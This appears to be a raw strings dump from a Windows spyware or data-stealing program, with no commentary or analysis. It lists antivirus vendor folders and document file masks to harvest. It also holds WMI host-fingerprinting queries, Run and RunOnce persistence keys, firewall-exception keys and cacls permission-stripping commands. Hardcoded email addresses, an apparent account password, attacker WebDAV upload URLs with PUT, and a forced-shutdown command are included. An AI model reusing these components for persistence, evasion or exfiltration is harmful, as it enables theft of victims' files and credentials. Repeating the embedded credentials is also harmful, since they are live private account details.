\Alice Total Security \AhnLab \Alwil Software \Ashampoo \AVG \avira \bitdefender \BullGuard Ltd \CA \CCleaner \ClamWin \ClamAV for Windows \Comodo \DriveSentry Security Suite \DrWeb \Emsisoft Anti-Malware \Eset \Faronics \FRISK Software \Fortinet \fsi \f-secure \G Data \Grisoft \IKARUS \Immunet Protect \INCAInternet \kaspersky lab \Lavasoft \Malwarebytes \Malwarebytes' Anti-Malware \McAfee \Microsoft Security Essentials \network associates \Norman \norton antivirus \norton internet security \norton security scan \norton 360 \Panda Security \PC Tools Antivirus \Quick Heal \Rising \SafeCentral \Softwin \Sophos \SPAMfighter \Spybot - Search & Destroy \SpyShredder \spyware doctor \Spyware Terminator \Sunbelt Software \Symantec \Symantec AntiVirus \Symantec Shared \ThreatFire \Trend Micro \TrustPort \UAV \Vba32 \Virusbuster \Webroot \Windows Defender \zone labs |
*.bmp *.cab *.cer *.chm *.config *.csv *.ctt *.dbx *.der *.doc *.docx *.eml *.exe *.gif *.gz *.hlp *.htm *.html *.ico *.inf *.ini *.jpg *.key *.log *.manifest *.mdb *.msg *.msi *.pfx *.png *.ppt *.pps *.pst *.rar *.rtf *.tif *.txt *.vbe *.vbs *.wab *.wmf *.wri *.xls *.xml *.zip |
WinForms_RecursiveFormCreate WinForms_SeeInnerException 0.0.0.0 192.168. 10. Set-Cookie Libero= :*:Enabled: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List guess515@fastmail.fm ossgetit CONFIGURATION .xml .zip purge626@gmail.com;tip848@gmail.com;dude626@gmail.com;octo424@gmail.com smtp.gmail.com purge626@gmail.com;tip848@gmail.com;dude626@gmail.com;octo424@gmail.com deletes \Microsoft\Outlook; \Identities; replacements requests wipedirs QUEUE purge626@gmail.com;tip848@gmail.com;dude626@gmail.com;octo424@gmail.com smtp.gmail.com purge626@gmail.com;tip848@gmail.com;dude626@gmail.com;octo424@gmail.com .zip reqcol deletes deletes replacements replacements .dll .exe .reg .tmp .xml .zip \ApplicationHistory \ApplicationHistory #,# #,# U/T {0:yyyyMMdd-HHmmss} ] commands rudeletekeynames windll rudeletekeynames HKEY_CURRENT_USERSoftware\Microsoft\Windows\CurrentVersion\Run rudeletekeynames rmdeletekeynames HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run rmdeletekeynames vmgr.exe guess515@fastmail.fm ossgetit commands commands root\CIMV2 SELECT * FROM Win32_ComputerSystemProduct Vendor Name IdentifyingNumber UUID root\CIMV2 SELECT * FROM Win32_ComputerSystem NumberOfProcessors PrimaryOwnerName SystemType TotalPhysicalMemory root\CIMV2 SELECT * FROM Win32_OperatingSystem Caption CSDVersion EncryptionLevel InstallDate LastBootUpTime NumberOfUsers SerialNumber *.doc *.xls *.ppt *.pps *.bmp *.cab *.cer *.chm *.config *.csv *.ctt *.dbx *.der *.doc *.docx *.eml *.exe *.gif *.gz *.hlp *.htm *.html *.ico *.inf *.ini *.jpg *.key *.log *.manifest *.mdb *.msg *.msi *.pfx *.png *.ppt *.pps *.pst *.rar *.rtf *.tif *.txt *.vbe *.vbs *.wab *.wmf *.wri *.xls *.xml *.zip /t /e /c /r " " /t /e /c /d " " \Alice Total Security \AhnLab \Alwil Software \Ashampoo \AVG \avira \bitdefender \BullGuard Ltd \CA \CCleaner \ClamWin \ClamAV for Windows \Comodo \DriveSentry Security Suite \DrWeb \Emsisoft Anti-Malware \Eset \Faronics \FRISK Software \Fortinet \fsi \f-secure \G Data \Grisoft \IKARUS \Immunet Protect \INCAInternet \kaspersky lab \Lavasoft \Malwarebytes \Malwarebytes' Anti-Malware \McAfee \Microsoft Security Essentials \network associates \Norman \norton antivirus \norton internet security \norton security scan \norton 360 \Panda Security \PC Tools Antivirus \Quick Heal \Rising \SafeCentral \Softwin \Sophos \SPAMfighter \Spybot - Search & Destroy \SpyShredder \spyware doctor \Spyware Terminator \Sunbelt Software \Symantec \Symantec AntiVirus \Symantec Shared \ThreatFire \Trend Micro \TrustPort \UAV \Vba32 \Virusbuster \Webroot \Windows Defender \zone labs ikrext imedev ipartx jawrb jebzmh jidlq jovqg jrfgmy juwqp kavbp kerzll kiqwbv Desaware.shcomponent20.dll dwshengine80.dll \grep.dat videxp vidhdw vrtdrv wdwapl wexprc winlng winxdrv wsndxp wxrun xddrv xdwdrv xpadp \wincd.dat out.alice.it mail.libero.it smtp.fastwebnet.it smtp.tiscali.it mail.mclink.it Received X-EM-Registration X-EM-Version X-Receiver X-Sars-E X-Sars-F X-Sars-Z X-Sender http://www.libero.it http://www.inwind.it http://www.iol.it https://dav.messagingengine.com/guess515.fastmail.fm/files/configuration/ .xml .xml MN600-D8102F401003102110C5114F1F18-0E8C MN600-D8102F401003102110C5114F1F18-0E8C MN600-D8102F401003102110C5114F1F18-0E8C MN600-D8102F401003102110C5114F1F18-0E8C run.exe ghk.exe PUT PUT root\CIMV2 SELECT * FROM Win32_OperatingSystem SerialNumber SerialNumber root\CIMV2 SELECT * FROM Win32_OperatingSystem LastBootUpTime \\root\\cimv2 Select * from Win32_Session LogonType StartTime shutdown /r /f /t 0 NET TIME /set /yes guess515@fastmail.fm ossgetit HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce commands commands https://dav.messagingengine.com/guess515.fastmail.fm/files/ guess515@fastmail.fm ossgetit HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 000 000 .zip .zip https://dav.messagingengine.com/guess515.fastmail.fm/files/replace/ guess515@fastmail.fm ossgetit *.* cacls.exe " " /t /e /c /d system cacls.exe " " /t /e /c /d users cacls.exe " " /t /e /c /d administrators cacls.exe " " /t /e /c /g administrators:f cacls.exe " " /t /e /c /g users:f cacls.exe " " /t /e /c /g system:f cacls.exe " " *.* : X-Mailer : X-Mailer .reg default.reg regedit.exe /s " " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USERSoftware\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List HKEY_CURRENT_USERSoftware\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\ HKEY_CURRENT_USER HKEY_CLASSES_ROOT\ HKEY_CLASSES_ROOT\ HKEY_CURRENT_USER HKEY_CURRENT_USER HKEY_LOCAL_MACHINE\ HKEY_LOCAL_MACHINE\ HKEY_USERS\ HKEY_USERS\ HKEY_CURRENT_CONFIG\ HKEY_CURRENT_CONFIG\ .reg regedit.exe /s " " Windows Registry Editor Version 5.00 ] " "=- .reg regedit.exe /s " " Windows Registry Editor Version 5.00 ] " "= " " HKEY_CLASSES_ROOT\ HKEY_CLASSES_ROOT\ HKEY_CURRENT_USER HKEY_CURRENT_USER HKEY_LOCAL_MACHINE\ HKEY_LOCAL_MACHINE\ HKEY_USERS\ HKEY_USERS\ HKEY_CURRENT_CONFIG\ HKEY_CURRENT_CONFIG\ HKEY_CLASSES_ROOT\ HKEY_CLASSES_ROOT\ HKEY_CURRENT_USER HKEY_CURRENT_USER HKEY_LOCAL_MACHINE\ HKEY_LOCAL_MACHINE\ HKEY_USERS\ HKEY_USERS\ HKEY_CURRENT_CONFIG\ HKEY_CURRENT_CONFIG\ Software\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\Run PUT DELE .exe https://dav.messagingengine.com/guess515.fastmail.fm/files/ http:// https:// HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP\v1.1.4322 SP NDP1.1sp1-KB867460-X86.exe http://download.microsoft.com/download/8/b/4/8b4addd8-e957-4dea-bdb8-c4e00af5b94b/NDP1.1sp1-KB867460-X86.exe /I /Q HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727 Install dotnetfx.exe http://download.microsoft.com/download/5/6/7/567758a3-759e-473e-bf8f-52154438565a/dotnetfx.exe /q:a /c:"install /q" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727 SP NetFx20SP1_x86.exe http://download.microsoft.com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe /Q HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0\Setup InstallSuccess dotnetfx3setup.exe http://download.microsoft.com/download/4/d/a/4da3a5fa-ee6a-42b8-8bfa-ea5c4a458a7d/dotnetfx3setup.exe /q HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0 SP dotnetfx30SP1setup.exe http://download.microsoft.com/download/4/9/0/49001df1-af88-4a4d-b10f-2d5e3a8ea5f3/dotnetfx30SP1setup.exe /Q HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5 Install dotNetFx35setup.exe http://download.microsoft.com/download/7/0/3/703455ee-a747-4cc8-bd3e-98a615c3aedb/dotNetFx35setup.exe /q /norestart HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5 SP dotnetfx35setup.exe http://download.microsoft.com/download/0/6/1/061F001C-8752-4600-A198-53214C69B51F/dotnetfx35setup.exe /Q run.exe \conf.xml HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run https://dav.messagingengine.com/guess515.fastmail.fm/files/ guess515@fastmail.fm ossgetit guess515@fastmail.fm ossgetit .exe .exe {0:yyyyMMdd-HHmmss} {0:yyyyMMdd-HHmmss} https://dav.messagingengine.com/guess515.fastmail.fm/files/decepk.dat guess515@fastmail.fm ossgetit Q6a8+uMg PUT е о р а х с Е Т О Р А Н Х С В М е о р а х с Е Т О Р А Н Х С В М , , \\ x2 ? \ " .exe* .zip .exe X-Sars-Z X-Sars-Z X-Sars-E X-Sars-E X-Sars-F X-Sars-E X-Sars-F X-Sars-Z Received Received .eml .eml yyyy MM dd yyyy MM dd yyyy MM dd |